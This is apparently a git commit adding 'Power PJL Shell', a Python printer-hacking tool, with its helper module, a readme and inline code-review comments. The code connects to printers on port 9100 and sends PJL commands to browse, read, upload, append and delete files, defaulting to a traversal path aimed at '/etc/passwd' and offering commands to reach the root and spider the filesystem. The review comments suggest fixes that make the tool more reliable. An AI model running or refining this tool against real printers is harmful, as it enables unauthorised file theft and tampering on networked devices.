root
2015-05-30 13:40:06 +02:00
commit aaea3013a7
3 changed files with 996 additions and 0 deletions

582
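--- a/pjl-shell.py
+++ b/pjl-shell.py
@@ -0,0 +1,582 @@
+#!/usr/bin/env python
+#
+# printer hacking again in 2012
+# classic 10years after :>
+import os
+import sys
+import pjl_func
+def usage():
+version = '0.3'
+print "Power PJL Shell by dash"
+print "~pwn some printers baby, version %s" % version
+print
+print
+print "<host> [<port>]"
+def help():
+#default fs commands
+print "Power PJL Shell"
+print
+print "PJL Commands:"
+print "cd <path> - change directory to path"
+print "ls - list current directory"
+print "dir - list current directory"
+print "get <file> - get a file from printer"
+print "put <file> - put file to printer"
+print "del <file> - delete file from printer"
+print "cat <file> - cat a file"
+print "drive <drive> - change to drive(0,1,2,...)"
+print "mkdir <dirname> - create directory(not working?)"
+print "append <file> - append data to a file on printer"
+print
+#default info commands
+print "PJL Infos:"
+print "infosys - print filesystem information"
+print "infoconf - print config information"
+print "infomem - info memory"
+print "infoid - info id"
+print "infostat - info status"
+print "infovars - info variables"
+print "infoustat - info ustatus (buggy?!)"
+print
+#network commands
+print "Connection Options:"
+print "open <printer> <port>- create new connection"
+print "close - close connection"
+print "exit - leave the shell"
+print
+#special commands
+print "Special Commands:"
+print "!r00tdir - traverse to / of printer"
+print "!passwd - print password file"
+print "spider <dir> - spider printer"
+print "!hackinfo - show important data"
+print
+print "Host Commands:"
+print "!ls - print files in ."
+print "!id - show id of the current user"
+print "!! <cmd> - execute abitrary command"
+print
+def prompt(pjl):
+print "pjl@%s>" % (pjl.path),
+try:
+cmd = raw_input()
+except KeyboardInterrupt:
+cmd=""
+print "\nPlease use Exit"
+return cmd
+def parseCmd(cmd):
+print "Command: %s" % cmd
+c = cmd.split(' ')
+return c
+def executeCmd(pjl,cmd):
+print "Execute: %s" % cmd
+cmd0=cmd[0]
+if cmd0=="!ls":
+buf = os.listdir(".")
+for entry in buf:
+print entry
+elif cmd0=="!id":
+buf = os.getuid()
+print buf
+elif cmd0=="!!":
+os.system(cmd[1])
+elif cmd0 == "help":
+help()
+elif cmd0 == "?":
+help()
+elif cmd0 == "infosys":
+infoFilesys(pjl)
+elif cmd0 == "infoconf":
+infoConf(pjl)
+elif cmd0 == "infomem":
+infoMem(pjl)
+elif cmd0 == "infoid":
+infoId(pjl)
+elif cmd0 == "infostatus":
+infoStatus(pjl)
+elif cmd0 == "infovars":
+infoVars(pjl)
+elif cmd0 == "infoustat":
+infoUStat(pjl)
+elif cmd0 == "exit":
+print "Cya"
+elif cmd0 == "open":
+#closing the connection
+pjl.s.close()
+#connecting
+print "Connecting: %s:%d" % (cmd[1], int(cmd[2]))
+pjl.host=cmd[1]
+pjl.port=int(cmd[2])
+openConnection(pjl)
+elif cmd0 == "close":
+pjl.s.close()
+elif cmd0 == "drive":
+if len(cmd)<2:
+print "drive <which>"
+else:
+pjl.drive=cmd[1]
+elif cmd0 == "stat":
+if len(cmd)<2:
+print "stat <what>"
+return
+fsQuery(pjl,cmd[1])
+elif cmd0 == "mkdir":
+if len(cmd)<2:
+print "mkdir <dir>"
+else:
+if cmd[1] != ".." and cmd[1]!=".":
+pjl.dFile=pjl.path+cmd[1]
+fsMkdir(pjl)
+else:
+print "Sorry .. / . not allowed"
+elif cmd0 == "get":
+if len(cmd)<2:
+print "get <file>"
+else:
+if cmd[1] != ".." and cmd[1]!=".":
+pjl.size=99999999
+pjl.dFile=pjl.path+cmd[1]
+fsUpload(pjl)
+else:
+print "Sorry .. / . not allowed"
+elif cmd0 == "cat":
+if len(cmd)<2:
+print "cat <file>"
+else:
+if cmd[1] != ".." and cmd[1]!=".":
+pjl.size=99999999
+pjl.dFile=pjl.path+cmd[1]
+catFile(pjl)
+else:
+print "Sorry .. / . not allowed"
+elif cmd0 == "spider":
+if len(cmd)<2:
+print "spider <dir>"
+else:
+if cmd[1] != ".." and cmd[1]!=".":
+pjl.size=99999999
+pjl.dFile=pjl.path+cmd[1]
+save3 = pjl.lDir
+save2 = pjl.dFile
+save = pjl.path
+pjl.walkTree(pjl.dFile)
+pjl.path=save
+pjl.dFile = save2
+pjl.lDir = save3
+else:
+print "Sorry .. / . not allowed"
+elif cmd0 == "put":
+if len(cmd)<2:
+print "put <file>"
+else:
+if cmd[1] != ".." and cmd[1]!=".":
+pjl.size=99999999
+pjl.dFile=pjl.path+cmd[1]
+pjl.hFile=cmd[1]
+print "Put: [%s]" % pjl.dFile
+fsDownload(pjl)
+else:
+print "Sorry .. / . not allowed"
+elif cmd0 == "append":
+if len(cmd)<3:
+print "append <file> <printerfile>"
+else:
+if (cmd[1] != ".." and cmd[1]!=".") and (cmd[2]) != ".." and cmd[2] != ".":
+pjl.size=99999999
+pjl.dFile=pjl.path+cmd[2]
+pjl.hFile=cmd[1]
+print "Put: [%s] to [%s]" % (pjl.hFile,pjl.dFile)
+fsAppend(pjl)
+else:
+print "Sorry .. / . not allowed"
+elif cmd0 == "del":
+if len(cmd)<2:
+print "del <file>"
+else:
+if cmd[1] != ".." and cmd[1]!=".":
+pjl.size=99999999
+pjl.dFile=pjl.path+cmd[1]
+fsDelete(pjl)
+else:
+print "Sorry .. / . not allowed"
+elif cmd0 == "dir" or cmd0 == "ls":
+if len(cmd)<2:
+fsDirlist(pjl,pjl.lDir)
+else:
+saveD = pjl.lDir
+d = pjl.lDir+cmd[1]
+fsDirlist(pjl,d)
+pjl.lDir=saveD
+# elif cmd0 == "ls":
+# if len(cmd)<2:
+# fsDirlist(pjl,pjl.lDir)
+# else:
+# saveD = pjl.lDir
+# d = pjl.lDir+cmd[1]
+# fsDirlist(pjl,d)
+# pjl.lDir=saveD
+elif cmd0 == "cd":
+if len(cmd)<2:
+pjl.lDir=pjl.home
+pjl.path=pjl.lDir
+else:
+saveD = pjl.lDir
+#here i should check with fsquery if is a dir and i have
+#permissions to access it
+if cmd[1] == '.':
+print "Ok, i stay here."
+return
+if cmd[1] == '..':
+tmp = pjl.lDir.split('/')
+print len(tmp)
+print tmp
+a=""
+for it in range(len(tmp)):
+#concat as long as its not the last entry
+#as we want to remove it :)
+if it+2 != len(tmp):
+#print it
+a = "%s%s/" % (a,tmp[it])
+a = a.replace('//','/')
+pjl.lDir = a
+pjl.path = pjl.lDir
+return
+elif cmd[1].find('/') == -1:
+pjl.lDir = pjl.lDir+cmd[1]+"/"
+pjl.path = pjl.lDir
+else:
+pjl.lDir = pjl.lDir+cmd[1]
+pjl.path = pjl.lDir
+#if fsquery says its not accessable
+#pjl.lDir=saveD
+else:
+print "Nothing Baby!"
+usage()
+pjl = pjl_func.pjl_commands()
+if len(sys.argv)<1:
+usage()
+elif len(sys.argv)==2:
+host = sys.argv[1]
+pjl.host = host
+elif len(sys.argv)==3:
+host = sys.argv[1]
+port = int(sys.argv[2])
+pjl.host = host
+pjl.port = port
+else:
+print "Erm. What ya doing??"
+usage()
+sys.exit(-1)
+pjl.saveData="tmp-download.file"
+def openConnection(pjl):
+pjl.createSocket(pjl.host,pjl.port)
+return 0
+def infoConf(pjl):
+pjl.buildRequest("infoconf")
+pjl.sendRequest(pjl.req)
+pjl.size=9999999
+pjl.recvRequest()
+pjl.parseRequest()
+print "Target: %s" % (pjl.host)
+print "Buffer: %s" % pjl.rBuf
+return 0
+def infoFilesys(pjl):
+pjl.buildRequest("infofsys")
+pjl.sendRequest(pjl.req)
+pjl.size=9999999
+pjl.recvRequest()
+pjl.parseRequest()
+print "Target: %s" % (pjl.host)
+print "Buffer: %s" % pjl.rBuf
+pjl.parseFSQUERY()
+return 0
+def infoMem(pjl):
+pjl.buildRequest("infomem")
+pjl.sendRequest(pjl.req)
+pjl.size=9999999
+pjl.recvRequest()
+pjl.parseRequest()
+print "Target: %s" % (pjl.host)
+print "Buffer: %s" % pjl.rBuf
+return 0
+def infoUStat(pjl):
+pjl.buildRequest("infoustat")
+pjl.sendRequest(pjl.req)
+pjl.size=9999999
+pjl.recvRequest()
+pjl.parseRequest()
+print "Target: %s" % (pjl.host)
+print "Buffer: %s" % pjl.rBuf
+return 0
+def infoVars(pjl):
+pjl.buildRequest("infovars")
+pjl.sendRequest(pjl.req)
+pjl.size=9999999
+pjl.recvRequest()
+pjl.parseRequest()
+print "Target: %s" % (pjl.host)
+print "Buffer: %s" % pjl.rBuf
+return 0
+def infoStatus(pjl):
+pjl.buildRequest("infostatus")
+pjl.sendRequest(pjl.req)
+pjl.size=9999999
+pjl.recvRequest()
+pjl.parseRequest()
+print "Target: %s" % (pjl.host)
+print "Buffer: %s" % pjl.rBuf
+return 0
+def infoId(pjl):
+pjl.buildRequest("infoid")
+pjl.sendRequest(pjl.req)
+pjl.size=9999999
+pjl.recvRequest()
+pjl.parseRequest()
+print "Target: %s" % (pjl.host)
+print "Buffer: %s" % pjl.rBuf
+return 0
+def fsDownload(pjl):
+#check for local file
+ss = os.stat(pjl.hFile)
+ssize = ss[6]
+print "Filesize: %d" % ssize
+pjl.upSize=ssize
+pjl.size=ssize
+pjl.loadFile()
+pjl.buildRequest("fsdownload")
+pjl.sendRequest(pjl.req)
+pjl.size=ssize
+#delete buffer
+pjl.sBuf=""
+#put the data
+pjl.sendRequestSelect()
+print len(pjl.rBuf)
+return 0
+def fsDelete(pjl):
+pjl.buildRequest("fsquery")
+pjl.sendRequest(pjl.req)
+pjl.size=9999999
+pjl.recvRequest()
+pjl.parseRequest()
+pjl.parseFSQUERY()
+print pjl.dFile
+print pjl.size
+print pjl.drive
+pjl.buildRequest("fsdelete")
+pjl.sendRequest(pjl.req)
+pjl.size=9999999
+return 0
+def catFile(pjl):
+pjl.buildRequest("fsquery")
+pjl.sendRequest(pjl.req)
+pjl.size=9999999
+pjl.recvRequest()
+pjl.parseRequest()
+pjl.parseFSQUERY()
+if pjl.error==1:
+print "Error, file not exist/accessable."
+return
+if pjl.ftype == "DIR":
+return
+pjl.downSize=pjl.size
+pjl.buildRequest("fsupload")
+pjl.sendRequest(pjl.req)
+pjl.size=9999999
+pjl.recvRequest()
+pjl.parseRequest()
+#delete buffer
+pjl.rBuf=""
+#get the data
+pjl.recvRequestSelect()
+print len(pjl.rBuf)
+pjl.parseRequest()
+print "Cat:\n%s" % pjl.rBuf
+return 0
+def fsUpload(pjl):
+pjl.buildRequest("fsquery")
+pjl.sendRequest(pjl.req)
+pjl.size=9999999
+pjl.recvRequest()
+pjl.parseRequest()
+pjl.parseFSQUERY()
+if pjl.error==1:
+print "Error, file not exist/accessable."
+return
+pjl.downSize=pjl.size
+pjl.buildRequest("fsupload")
+pjl.sendRequest(pjl.req)
+pjl.size=9999999
+pjl.recvRequest()
+pjl.parseRequest()
+#delete buffer
+pjl.rBuf=""
+#get the data
+pjl.recvRequestSelect()
+print len(pjl.rBuf)
+save = pjl.dFile.replace('/','_')
+pjl.saveData=save
+pjl.saveFile()
+return 0
+def fsAppend(pjl):
+ss = os.stat(pjl.hFile)
+ssize = ss[6]
+print "Filesize: %d" % ssize
+pjl.upSize=ssize
+pjl.size=ssize
+pjl.loadFile()
+pjl.buildRequest("fsappend")
+pjl.sendRequest(pjl.req)
+pjl.size=ssize
+pjl.sBuf=""
+#put the data
+pjl.sendRequestSelect()
+print len(pjl.rBuf)
+def fsQuery(pjl,dFile):
+pjl.dFile=dFile
+pjl.buildRequest("fsquery")
+pjl.sendRequest(pjl.req)
+pjl.size=9999999
+pjl.recvRequest()
+pjl.parseRequest()
+print "Target: %s" % (pjl.host)
+print "Buffer: %s" % pjl.rBuf
+pjl.parseFSQUERY()
+return 0
+def fsMkdir(pjl):
+pjl.buildRequest("fsmkdir")
+pjl.sendRequest(pjl.req)
+pjl.size=9999999
+return 0
+def fsDirlist(pjl,lDir):
+pjl.lDir=lDir
+pjl.buildRequest("fsdirlist")
+pjl.sendRequest(pjl.req)
+pjl.size=9999999
+#pjl.recvRequestSelectNormal()
+pjl.recvRequest()
+pjl.parseRequest()
+print "Target: %s" % (pjl.host)
+print "Buffer: %s" % pjl.rBuf
+return 0
+def initShell(pjl):
+openConnection(pjl)
+infoFilesys(pjl)
+getDrive(pjl)
+changeDirectory(pjl)
+listDirectory(pjl)
+def putFile(pjl, lfile, rfile):
+print "implement me"
+cmd=""
+while cmd!="exit":
+openConnection(pjl)
+cmd=prompt(pjl)
+cmddata=parseCmd(cmd)
+result = executeCmd(pjl,cmddata)
+pjl.s.close()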
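Review bot: The `open` and `!!` branches of executeCmd index `cmd[1]` and `cmd[2]` without the `len(cmd)` check that every file-system branch has, so a bare `open` or `!!` ends the whole shell with an IndexError, and a non-numeric port does the same with a ValueError from `int(cmd[2])`. A guard in the style already used here would do, for example `if len(cmd)<3: print "open <printer> <port>"` before `pjl.s.close()` is reached. The help text lists `infostat` while the dispatcher only matches `infostatus`, and initShell calls getDrive, changeDirectory and listDirectory, none of which is defined in this file, so it would raise NameError if it were ever called. Indentation is lost in this rendering, so the branch nesting is read from the statement order and should be confirmed against the file.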

403
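--- a/pjl_func.py
+++ b/pjl_func.py
@@ -0,0 +1,403 @@
+import os
+import sys
+import socket
+import select
+class pjl_commands(object):
+def __init__(self):
+self.host="127.0.0.1"
+self.port=9100
+self.s = ""
+self.req = ""
+self.cnt = 0
+self.rBuf = ""
+self.sBuf = ""
+self.drive = "0:"
+self.hFile = "test.txt"
+self.dFile = "/../../../etc/passwd"
+self.lDir = "/../../../"
+self.path = "/../../../"
+self.home = "/../../../"
+self.ftype = ""
+self.size = 999999999
+self.downSize = 0
+self.upSize = 0
+self.saveData = "tmp.download.file"
+self.fileBuf = ""
+self.error=0
+self.errortype=0
+def printError(self):
+"""whoohooo my own error function, believe me it is AWESOME!!"""
+if self.errortype == 0:
+print "Alright!"
+elif self.errortype == 1:
+print "Uhm."
+else:
+print "Unknown Errorcode: %d" % (self.errortype)
+def createSocket(self, host, port):
+""" create the socket """
+try:
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((host,port))
+self.s = s
+return
+except socket.error,e:
+print "%s" % e
+return
+def sendRequest(self,command):
+""" send the request """
+pjlS = "@PJL\r\n"
+try:
+self.s.send(pjlS)
+self.s.send(command)
+except socket.error, e:
+print "Error: %s" % e
+return
+def recvRequest(self):
+""" recv the data from the request and put it into a buffer """
+self.rBuf=self.s.recv(self.size)
+def sendRequestSelect(self):
+""" send Data """
+outputs = [self.s]
+sdata = 0
+while len(outputs)>0:
+if sdata >= self.upSize:
+#if len(self.sBuf) >= self.upSize:
+print "Finished"
+break
+print "while %d" % len(outputs)
+try:
+inputrdy,outputrdy,exceptrdy = select.select([],outputs,[])
+except select.error, e:
+break
+except socket.error, e:
+break
+for canidate in outputrdy:
+if canidate == self.s:
+print "send"
+data = self.s.send(self.fileBuf)
+#laenge wichtig hier
+#self.sBuf=self.sBuf+data
+sdata = sdata + data
+if not data:
+print "input: %d" % (len(self.sBuf))
+print "sdata: %d" % sdata
+break
+#print "data: %d" % (len(data))
+escE = "\r\n\x1b%-12345X"
+self.s.send(escE)
+def recvRequestSelectNormal(self):
+""" recv the data from the request and put it into a buffer """
+running = 1
+inputs = [self.s]
+while running:
+# print "while %d" % len(inputs)
+try:
+inputrdy,outputrdy,exceptrdy = select.select(inputs,inputs,[])
+#inputrdy,outputrdy,exceptrdy = select.select(inputs,[],[])
+except select.error, e:
+break
+except socket.error, e:
+break
+for canidate in outputrdy:
+if canidate == self.s:
+break
+for canidate in inputrdy:
+if canidate == self.s:
+print "recv"
+data = self.s.recv(1024)
+if data:
+self.rBuf=self.rBuf+data
+else:
+return
+# print "input: %d" % (len(self.rBuf))
+# print "data: %d" % (len(data))
+def recvRequestSelect(self):
+""" recv the data from the request and put it into a buffer """
+running = 1
+inputs = [self.s]
+while len(inputs)>0:
+if len(self.rBuf) >= self.downSize:
+print "Finished"
+break
+# print "while %d" % len(inputs)
+try:
+inputrdy,outputrdy,exceptrdy = select.select(inputs,[],[])
+except select.error, e:
+break
+except socket.error, e:
+break
+for canidate in inputrdy:
+if canidate == self.s:
+# print "recv"
+data = self.s.recv(1024)
+if data:
+self.rBuf=self.rBuf+data
+# print "input: %d" % (len(self.rBuf))
+# print "data: %d" % (len(data))
+def parseRequest(self):
+""" pre-parse the request and remove control-sequences """
+self.rBuf = self.rBuf.replace('\x0c','')
+def buildRequest(self, request):
+""" put together the request to send """
+#sequences
+escS = "\x1b%-12345X@PJL "
+escE = "\r\n\x1b%-12345X"
+#commands
+infoid = "INFO ID"
+infofsys = "INFO FILESYS"
+infoconf = "INFO CONFIG"
+infomem = " INFO MEMORY"
+infopcount = "INFO PAGECOUNT"
+infostatus = "INFO STATUS"
+infovars = "INFO VARIABLES"
+infoustatus = "INFO USTATUS"
+fsdownload = "FSDOWNLOAD FORMAT:BINARY NAME = "
+fsdirlist = "FSDIRLIST NAME = "
+fsupload = "FSUPLOAD NAME = "
+fsquery = "FSQUERY NAME = "
+fsmkdir = "FSMKDIR NAME = "
+fsappend = "FSAPPEND FORMAT:BINARY NAME = "
+fsdelete = "FSDELETE NAME = "
+ustatuson = "USTATUS"
+ustatusoff = "USTATUSOFF"
+rdymsg = "RDYMSG DISPLAY = "
+opmsg = "OPMSG DISPLAY = "
+stmsg = "STMSG DISPLAY = "
+if request=="infofsys":
+self.req = "%s%s%s" % (escS,infofsys,escE)
+elif request=="getDrive":
+self.req = "%s%s%s" % (escS,infofsys,escE)
+elif request=="infoconf":
+self.req = "%s%s%s" % (escS,infoconf,escE)
+elif request=="infoid":
+self.req = "%s%s%s" % (escS,infoid,escE)
+elif request=="infomem":
+self.req = "%s%s%s" % (escS,infomem,escE)
+elif request=="infostatus":
+self.req = "%s%s%s" % (escS,infostatus,escE)
+elif request=="infovars":
+self.req = "%s%s%s" % (escS,infovars,escE)
+elif request=="infoustat":
+self.req = "%s%s%s" % (escS,infoustatus,escE)
+elif request=="fsdirlist":
+self.req = "%s%s\"%s%s\" ENTRY=1 COUNT=999999999%s" % (escS,fsdirlist,self.drive,self.lDir ,escE)
+elif request=="fsquery":
+self.req = "%s%s\"%s%s\"%s" % (escS,fsquery,self.drive,self.dFile,escE)
+elif request=="fsupload":
+self.req = "%s%s\"%s%s\" OFFSET=0 SIZE=%d %s" % (escS,fsupload,self.drive,self.dFile,self.size,escE)
+elif request=="fsdownload":
+self.req = "%s%s\"%s%s\" SIZE=%d\r\n" % (escS,fsdownload,self.drive,self.dFile,self.size)
+elif request=="fsappend":
+self.req = "%s%s\"%s%s\" SIZE=%d\r\n" % (escS,fsappend,self.drive,self.dFile,self.size)
+elif request=="fsmkdir":
+self.req = "%s%s\"%s%s\"%s" % (escS,fsmkdir,self.drive,self.dFile,escE)
+elif request=="fsdelete":
+self.req = "%s%s\"%s%s\"%s" % (escS,fsdelete,self.drive,self.dFile,escE)
+def parseFSQUERY(self):
+""" find type and size of file or dir or not exists"""
+data = self.rBuf
+print "Respone: %s" % data
+#check for error
+ferror = data.find('FILEERROR')
+if ferror>=0:
+self.error=1
+return -1
+else:
+self.error=0
+#find type
+ftype = data.find('TYPE=')
+print ftype
+ftypeE = data.find(' ',ftype)
+ftype = data[ftype+5:ftypeE]
+self.ftype = ftype
+self.ftype = self.ftype.replace('\r','')
+self.ftype = self.ftype.replace('\n','')
+#self.ftype = self.ftype.rstrip()
+print "Filetype: [%s]" % self.ftype
+if self.ftype == "FILE":
+s1 = data.find('SIZE=')
+s2 = data.find('\r\n')
+sz = data[(s1+5):s2]
+try:
+self.size = int(sz)
+except ValueError:
+print "Dang, recv buffer to small for dir, just reseting self.size"
+self.size=99999999
+print "SIZE: [%d]" % self.size
+def loadFile(self):
+#remove last byte
+fr = open(self.hFile,"r")
+self.fileBuf = fr.read()
+fr.close()
+print "fileBuf: %d" % (len(self.fileBuf))
+def saveFile(self):
+#remove last byte
+self.rBuf = self.rBuf[0:-1]
+fw = open(self.saveData,"w")
+fw.write(self.rBuf)
+fw.close()
+def parseGetDrive(self):
+""" get the current drive from the filesys info
+attention only one drive added, possible more drives not
+taken care of """
+print "implement me"
+def spiderSaveLog(self,lDir,rlist,logname):
+"""save spider data to logfile """
+print "lDir: %s" % lDir
+print "rlist: %s" % rlist
+fw = open(logname,'a')
+print len(rlist)
+if len(rlist) == 1:
+write="%s\n" % (lDir)
+fw.write(write)
+for item in rlist:
+if item != '':
+write="%s/%s\n" % (lDir, item)
+fw.write(write)
+fw.close()
+def buildListdir(self,lDir):
+"""sub-function for fslistdir"""
+dirWalk=[]
+self.lDir=lDir
+self.buildRequest("fsdirlist")
+self.sendRequest(self.req)
+self.size=9999999
+self.recvRequest()
+self.parseRequest()
+rlist = self.rBuf.split('\r\n')
+#print rlist
+rlist.pop(0)
+rlist.pop(0)
+rlist.pop(0)
+# print rlist
+print "Dirlisting:"
+self.spiderSaveLog(lDir,rlist,self.host+'.log.txt')
+for item in rlist:
+print item
+for item in rlist:
+f1 = item.find('TYPE=DIR')
+if f1 >= 0:
+i0 = item.split(' ')
+dirWalk.append(i0[0])
+print dirWalk
+return dirWalk
+def checkAccess(self, entry):
+self.lDir=entry
+self.buildRequest("fsdirlist")
+self.sendRequest(self.req)
+self.size=9999999
+self.recvRequest()
+self.parseRequest()
+#check for error
+ferror = self.rBuf.find('FILEERROR')
+if ferror>=0:
+self.error=1
+return -1
+else:
+self.error=0
+# print "buff: %s" % self.rBuf
+def checkFileType(self, entry):
+"""check the filetype"""
+print "checkFileType"
+self.dFile = entry
+self.buildRequest("fsquery")
+self.sendRequest(self.req)
+self.size=99999999
+self.recvRequest()
+self.parseRequest()
+self.parseFSQUERY()
+print "Type: [%s]" % (self.ftype)
+return self.ftype
+def walkTree(self,edir):
+"""tree walk function, for walking remote directories"""
+self.cnt+=1
+self.checkAccess(edir)
+self.checkFileType(edir)
+if self.ftype != "DIR":
+print "Not directory, End"
+return
+elif self.error == 1:
+print "Fileerror"
+return
+print "Absolute Path: %s" % self.dFile
+#self.buildListdir(self.dFile)
+saveDir=self.dFile
+for file in [ file for file in self.buildListdir(self.dFile)]:
+self.dFile=saveDir
+print "File: %s " % file
+print "dFile: %s" % self.dFile
+print "Path: %s" % self.path
+nfile = self.dFile+'/'+file
+print "nFile: %s" % nfile
+self.checkAccess(nfile)
+if self.error!=1:
+if self.checkFileType(nfile) == "DIR":
+print "got DIR!!"
+#return
+self.walkTree(nfile)
+#print "Finished Spider"
+return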
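Review bot: recvRequestSelect never handles an empty `recv()`: if the peer closes the connection before `downSize` bytes have arrived, `select` keeps reporting the socket readable, `data` is empty, and the `while` loop spins forever. The callers in pjl-shell.py copy `downSize` from the size that parseFSQUERY reads out of the peer's `SIZE=` reply, so the remote end decides whether this loop terminates. Add `else: return` under `if data:` as recvRequestSelectNormal already does, and pass a timeout as the fourth argument of `select.select(inputs,[],[])`. recvRequest has the same trust problem in a milder form: it relies on a single `recv(self.size)` returning the whole reply, which TCP does not guarantee, and parseFSQUERY then slices whatever arrived without checking that `find('TYPE=')` or `find('SIZE=')` succeeded. Indentation is lost in this rendering, so the placement of the `if data:` block is read from the statement order.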

11
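--- a/readme.txt
+++ b/readme.txt
@@ -0,0 +1,11 @@
+intro
+=====
+well not a lot to say here.
+just connect to a printer which has port 9100 running :)
+btw. for background information go to the research done by phenoelit ppl, fx and ftr ~2000.
+http://www.phenoelit.org/fr/tools.html
+ch33rs!
+dash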